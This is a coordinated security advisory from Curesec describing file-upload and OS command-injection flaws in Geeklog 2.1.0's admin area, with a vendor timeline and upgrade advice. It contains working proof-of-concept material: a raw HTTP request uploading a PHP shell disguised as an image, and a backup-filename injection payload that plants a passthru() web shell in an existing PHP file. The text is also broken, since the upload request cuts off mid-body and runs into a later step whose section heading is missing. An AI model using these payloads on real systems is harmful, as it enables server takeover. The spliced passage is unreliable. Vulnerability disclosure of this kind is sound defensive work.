Security Advisory - Curesec Research Team 1. Introduction Affected Product: Geeklog 2.1.0 Fixed in: 2.1.1b3 Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156 Vendor Contact: geeklog-security@lists.geeklog.net Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview The admin area of Geeklog suffers from two vulnerabilities that can lead to code execution: OS Command Injection and Upload of Files with Dangerous Type. The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1, the OS command injection in version 2.1.1b3. 3. Upload of Files with Dangerous Type CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a file, the file type check is performed only client-side. An attacker can easily bypass this check and thus upload files of dangerous types, such as PHP files. To upload files, an attacker needs a registered user that is in the group "Filemanager Admin". Proof of Concept POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Length: 761 Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773 Cookie: [cookies] -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="mode" add -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="currentpath" /var/www/geeklog-2.1.0/public_html/images/ -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="filepath" test.png -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="newfile"; filename="shell.php" Content-Type: image/png shell.php;" 2. Perform database backup here: http://localhost/geeklog-2.1.0/public_html/admin/database.php The injected commands will be executed. In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command injection is still possible, including the creation of a PHP shell by appending the injected PHP code to an existing PHP file without closing tags: geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;" Code /admin/database.php function dobackup() { [...] if (!empty($_CONF['mysqldump_filename_mask'])) { $filename_mask = strftime($_CONF['mysqldump_filename_mask']); } [...] $backupfile = $_CONF['backup_path'] . $filename_mask; [...] $command .= " $_DB_name > \"$backupfile\""; [...] if ($canExec) { exec($command); 5. Solution To mitigate this issue please upgrade at least to version 2.1.1b3: https://www.geeklog.net/filemgmt/visit.php/1156 Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date 10/21/2015 Vendor asks for an additional two weeks for testing 11/17/2015 CVE Requested (no reply) 11/17/2015 Reminded Vendor of disclosure date 11/17/2015 Vendor points to beta version and announces release 11/24/2015 Informed Vendor of insufficient fix in beta 11/30/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany